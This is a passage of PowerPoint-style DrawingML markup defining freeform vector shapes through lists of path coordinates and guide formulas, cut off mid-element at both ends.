                      <a:pt x="489" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="547" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="484" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="521"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="521"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="526"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="379"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="43"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="174" y="284"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="174" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="421"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="421"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="284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2" name="Freeform 43"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6834188" y="1976438"/>
                <a:ext cx="223837" cy="173037"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 509 w 621"/>
                  <a:gd name="T1" fmla="*/ 99 h 479"/>
                  <a:gd name="T2" fmla="*/ 452 w 621"/>
                  <a:gd name="T3" fmla="*/ 147 h 479"/>
                  <a:gd name="T4" fmla="*/ 452 w 621"/>
                  <a:gd name="T5" fmla="*/ 152 h 479"/>
                  <a:gd name="T6" fmla="*/ 452 w 621"/>
                  <a:gd name="T7" fmla="*/ 152 h 479"/>
                  <a:gd name="T8" fmla="*/ 499 w 621"/>
                  <a:gd name="T9" fmla="*/ 147 h 479"/>
                  <a:gd name="T10" fmla="*/ 536 w 621"/>
                  <a:gd name="T11" fmla="*/ 147 h 479"/>
                  <a:gd name="T12" fmla="*/ 536 w 621"/>
                  <a:gd name="T13" fmla="*/ 147 h 479"/>
                  <a:gd name="T14" fmla="*/ 556 w 621"/>
                  <a:gd name="T15" fmla="*/ 152 h 479"/>
                  <a:gd name="T16" fmla="*/ 573 w 621"/>
                  <a:gd name="T17" fmla="*/ 162 h 479"/>
                  <a:gd name="T18" fmla="*/ 588 w 621"/>
                  <a:gd name="T19" fmla="*/ 173 h 479"/>
                  <a:gd name="T20" fmla="*/ 604 w 621"/>
                  <a:gd name="T21" fmla="*/ 189 h 479"/>
                  <a:gd name="T22" fmla="*/ 604 w 621"/>
                  <a:gd name="T23" fmla="*/ 189 h 479"/>
                  <a:gd name="T24" fmla="*/ 614 w 621"/>
                  <a:gd name="T25" fmla="*/ 194 h 479"/>
                  <a:gd name="T26" fmla="*/ 614 w 621"/>
                  <a:gd name="T27" fmla="*/ 194 h 479"/>
                  <a:gd name="T28" fmla="*/ 620 w 621"/>
                  <a:gd name="T29" fmla="*/ 210 h 479"/>
                  <a:gd name="T30" fmla="*/ 520 w 621"/>
                  <a:gd name="T31" fmla="*/ 299 h 479"/>
                  <a:gd name="T32" fmla="*/ 520 w 621"/>
                  <a:gd name="T33" fmla="*/ 299 h 479"/>
                  <a:gd name="T34" fmla="*/ 504 w 621"/>
                  <a:gd name="T35" fmla="*/ 283 h 479"/>
                  <a:gd name="T36" fmla="*/ 504 w 621"/>
                  <a:gd name="T37" fmla="*/ 283 h 479"/>
                  <a:gd name="T38" fmla="*/ 494 w 621"/>
                  <a:gd name="T39" fmla="*/ 262 h 479"/>
                  <a:gd name="T40" fmla="*/ 494 w 621"/>
                  <a:gd name="T41" fmla="*/ 262 h 479"/>
                  <a:gd name="T42" fmla="*/ 462 w 621"/>
                  <a:gd name="T43" fmla="*/ 241 h 479"/>
                  <a:gd name="T44" fmla="*/ 462 w 621"/>
                  <a:gd name="T45" fmla="*/ 241 h 479"/>
                  <a:gd name="T46" fmla="*/ 446 w 621"/>
                  <a:gd name="T47" fmla="*/ 231 h 479"/>
                  <a:gd name="T48" fmla="*/ 426 w 621"/>
                  <a:gd name="T49" fmla="*/ 225 h 479"/>
                  <a:gd name="T50" fmla="*/ 426 w 621"/>
                  <a:gd name="T51" fmla="*/ 225 h 479"/>
                  <a:gd name="T52" fmla="*/ 409 w 621"/>
                  <a:gd name="T53" fmla="*/ 225 h 479"/>
                  <a:gd name="T54" fmla="*/ 389 w 621"/>
                  <a:gd name="T55" fmla="*/ 231 h 479"/>
                  <a:gd name="T56" fmla="*/ 389 w 621"/>
                  <a:gd name="T57" fmla="*/ 231 h 479"/>
                  <a:gd name="T58" fmla="*/ 368 w 621"/>
                  <a:gd name="T59" fmla="*/ 236 h 479"/>
                  <a:gd name="T60" fmla="*/ 347 w 621"/>
                  <a:gd name="T61" fmla="*/ 252 h 479"/>
                  <a:gd name="T62" fmla="*/ 95 w 621"/>
                  <a:gd name="T63" fmla="*/ 478 h 479"/>
                  <a:gd name="T64" fmla="*/ 0 w 621"/>
                  <a:gd name="T65" fmla="*/ 372 h 479"/>
                  <a:gd name="T66" fmla="*/ 415 w 621"/>
                  <a:gd name="T67" fmla="*/ 0 h 479"/>
                  <a:gd name="T68" fmla="*/ 509 w 621"/>
                  <a:gd name="T69" fmla="*/ 99 h 4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21" h="479">
                    <a:moveTo>
                      <a:pt x="509" y="99"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="452" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="604" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="604" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="620" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="509" y="99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3" name="Freeform 44"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6913563" y="2030413"/>
                <a:ext cx="258762" cy="301625"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 362 w 720"/>
                  <a:gd name="T1" fmla="*/ 357 h 836"/>
                  <a:gd name="T2" fmla="*/ 367 w 720"/>
                  <a:gd name="T3" fmla="*/ 362 h 836"/>
                  <a:gd name="T4" fmla="*/ 619 w 720"/>
                  <a:gd name="T5" fmla="*/ 341 h 836"/>
                  <a:gd name="T6" fmla="*/ 719 w 720"/>
                  <a:gd name="T7" fmla="*/ 467 h 836"/>
                  <a:gd name="T8" fmla="*/ 446 w 720"/>
                  <a:gd name="T9" fmla="*/ 478 h 836"/>
                  <a:gd name="T10" fmla="*/ 299 w 720"/>
                  <a:gd name="T11" fmla="*/ 835 h 836"/>
                  <a:gd name="T12" fmla="*/ 199 w 720"/>
                  <a:gd name="T13" fmla="*/ 709 h 836"/>
                  <a:gd name="T14" fmla="*/ 305 w 720"/>
                  <a:gd name="T15" fmla="*/ 473 h 836"/>
                  <a:gd name="T16" fmla="*/ 220 w 720"/>
                  <a:gd name="T17" fmla="*/ 478 h 836"/>
                  <a:gd name="T18" fmla="*/ 89 w 720"/>
                  <a:gd name="T19" fmla="*/ 577 h 836"/>
                  <a:gd name="T20" fmla="*/ 0 w 720"/>
                  <a:gd name="T21" fmla="*/ 467 h 836"/>
                  <a:gd name="T22" fmla="*/ 582 w 720"/>
                  <a:gd name="T23" fmla="*/ 0 h 836"/>
                  <a:gd name="T24" fmla="*/ 672 w 720"/>
                  <a:gd name="T25" fmla="*/ 116 h 836"/>
                  <a:gd name="T26" fmla="*/ 362 w 720"/>
                  <a:gd name="T27" fmla="*/ 357 h 8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20" h="836">
                    <a:moveTo>
                      <a:pt x="362" y="357"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="367" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="719" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="835"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="709"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="577"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="672" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="357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4" name="Freeform 45"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7096125" y="2289175"/>
                <a:ext cx="271463" cy="239713"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 157 w 752"/>
                  <a:gd name="T1" fmla="*/ 368 h 668"/>
                  <a:gd name="T2" fmla="*/ 131 w 752"/>
                  <a:gd name="T3" fmla="*/ 399 h 668"/>
                  <a:gd name="T4" fmla="*/ 131 w 752"/>
                  <a:gd name="T5" fmla="*/ 436 h 668"/>
                  <a:gd name="T6" fmla="*/ 152 w 752"/>
                  <a:gd name="T7" fmla="*/ 483 h 668"/>
                  <a:gd name="T8" fmla="*/ 200 w 752"/>
                  <a:gd name="T9" fmla="*/ 520 h 668"/>
                  <a:gd name="T10" fmla="*/ 237 w 752"/>
                  <a:gd name="T11" fmla="*/ 525 h 668"/>
                  <a:gd name="T12" fmla="*/ 273 w 752"/>
                  <a:gd name="T13" fmla="*/ 510 h 668"/>
                  <a:gd name="T14" fmla="*/ 310 w 752"/>
                  <a:gd name="T15" fmla="*/ 478 h 668"/>
                  <a:gd name="T16" fmla="*/ 326 w 752"/>
                  <a:gd name="T17" fmla="*/ 441 h 668"/>
                  <a:gd name="T18" fmla="*/ 326 w 752"/>
                  <a:gd name="T19" fmla="*/ 394 h 668"/>
                  <a:gd name="T20" fmla="*/ 299 w 752"/>
                  <a:gd name="T21" fmla="*/ 279 h 668"/>
                  <a:gd name="T22" fmla="*/ 294 w 752"/>
                  <a:gd name="T23" fmla="*/ 195 h 668"/>
                  <a:gd name="T24" fmla="*/ 315 w 752"/>
                  <a:gd name="T25" fmla="*/ 126 h 668"/>
                  <a:gd name="T26" fmla="*/ 362 w 752"/>
                  <a:gd name="T27" fmla="*/ 69 h 668"/>
                  <a:gd name="T28" fmla="*/ 441 w 752"/>
                  <a:gd name="T29" fmla="*/ 21 h 668"/>
                  <a:gd name="T30" fmla="*/ 567 w 752"/>
                  <a:gd name="T31" fmla="*/ 5 h 668"/>
                  <a:gd name="T32" fmla="*/ 641 w 752"/>
                  <a:gd name="T33" fmla="*/ 48 h 668"/>
                  <a:gd name="T34" fmla="*/ 704 w 752"/>
                  <a:gd name="T35" fmla="*/ 121 h 668"/>
                  <a:gd name="T36" fmla="*/ 745 w 752"/>
                  <a:gd name="T37" fmla="*/ 205 h 668"/>
                  <a:gd name="T38" fmla="*/ 751 w 752"/>
                  <a:gd name="T39" fmla="*/ 284 h 668"/>
                  <a:gd name="T40" fmla="*/ 725 w 752"/>
                  <a:gd name="T41" fmla="*/ 357 h 668"/>
                  <a:gd name="T42" fmla="*/ 641 w 752"/>
                  <a:gd name="T43" fmla="*/ 431 h 668"/>
                  <a:gd name="T44" fmla="*/ 598 w 752"/>
                  <a:gd name="T45" fmla="*/ 284 h 668"/>
                  <a:gd name="T46" fmla="*/ 625 w 752"/>
                  <a:gd name="T47" fmla="*/ 252 h 668"/>
                  <a:gd name="T48" fmla="*/ 625 w 752"/>
                  <a:gd name="T49" fmla="*/ 199 h 668"/>
                  <a:gd name="T50" fmla="*/ 598 w 752"/>
                  <a:gd name="T51" fmla="*/ 163 h 668"/>
                  <a:gd name="T52" fmla="*/ 572 w 752"/>
                  <a:gd name="T53" fmla="*/ 142 h 668"/>
                  <a:gd name="T54" fmla="*/ 541 w 752"/>
                  <a:gd name="T55" fmla="*/ 142 h 668"/>
                  <a:gd name="T56" fmla="*/ 494 w 752"/>
                  <a:gd name="T57" fmla="*/ 158 h 668"/>
                  <a:gd name="T58" fmla="*/ 451 w 752"/>
                  <a:gd name="T59" fmla="*/ 199 h 668"/>
                  <a:gd name="T60" fmla="*/ 446 w 752"/>
                  <a:gd name="T61" fmla="*/ 231 h 668"/>
                  <a:gd name="T62" fmla="*/ 473 w 752"/>
                  <a:gd name="T63" fmla="*/ 399 h 668"/>
                  <a:gd name="T64" fmla="*/ 473 w 752"/>
                  <a:gd name="T65" fmla="*/ 483 h 668"/>
                  <a:gd name="T66" fmla="*/ 462 w 752"/>
                  <a:gd name="T67" fmla="*/ 541 h 668"/>
                  <a:gd name="T68" fmla="*/ 431 w 752"/>
                  <a:gd name="T69" fmla="*/ 588 h 668"/>
                  <a:gd name="T70" fmla="*/ 378 w 752"/>
                  <a:gd name="T71" fmla="*/ 625 h 668"/>
                  <a:gd name="T72" fmla="*/ 241 w 752"/>
                  <a:gd name="T73" fmla="*/ 667 h 668"/>
                  <a:gd name="T74" fmla="*/ 157 w 752"/>
                  <a:gd name="T75" fmla="*/ 640 h 668"/>
                  <a:gd name="T76" fmla="*/ 53 w 752"/>
                  <a:gd name="T77" fmla="*/ 530 h 668"/>
                  <a:gd name="T78" fmla="*/ 5 w 752"/>
                  <a:gd name="T79" fmla="*/ 431 h 668"/>
                  <a:gd name="T80" fmla="*/ 0 w 752"/>
                  <a:gd name="T81" fmla="*/ 346 h 668"/>
                  <a:gd name="T82" fmla="*/ 68 w 752"/>
                  <a:gd name="T83" fmla="*/ 242 h 668"/>
                  <a:gd name="T84" fmla="*/ 210 w 752"/>
                  <a:gd name="T85" fmla="*/ 326 h 6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752" h="668">
                    <a:moveTo>
                      <a:pt x="194" y="336"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="194" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="604" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="641" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="672" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="704" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="704" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="745" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="745" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="751" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="751" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="751" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="745" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="698" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="656" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="641" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="561" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="561" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="399"/>
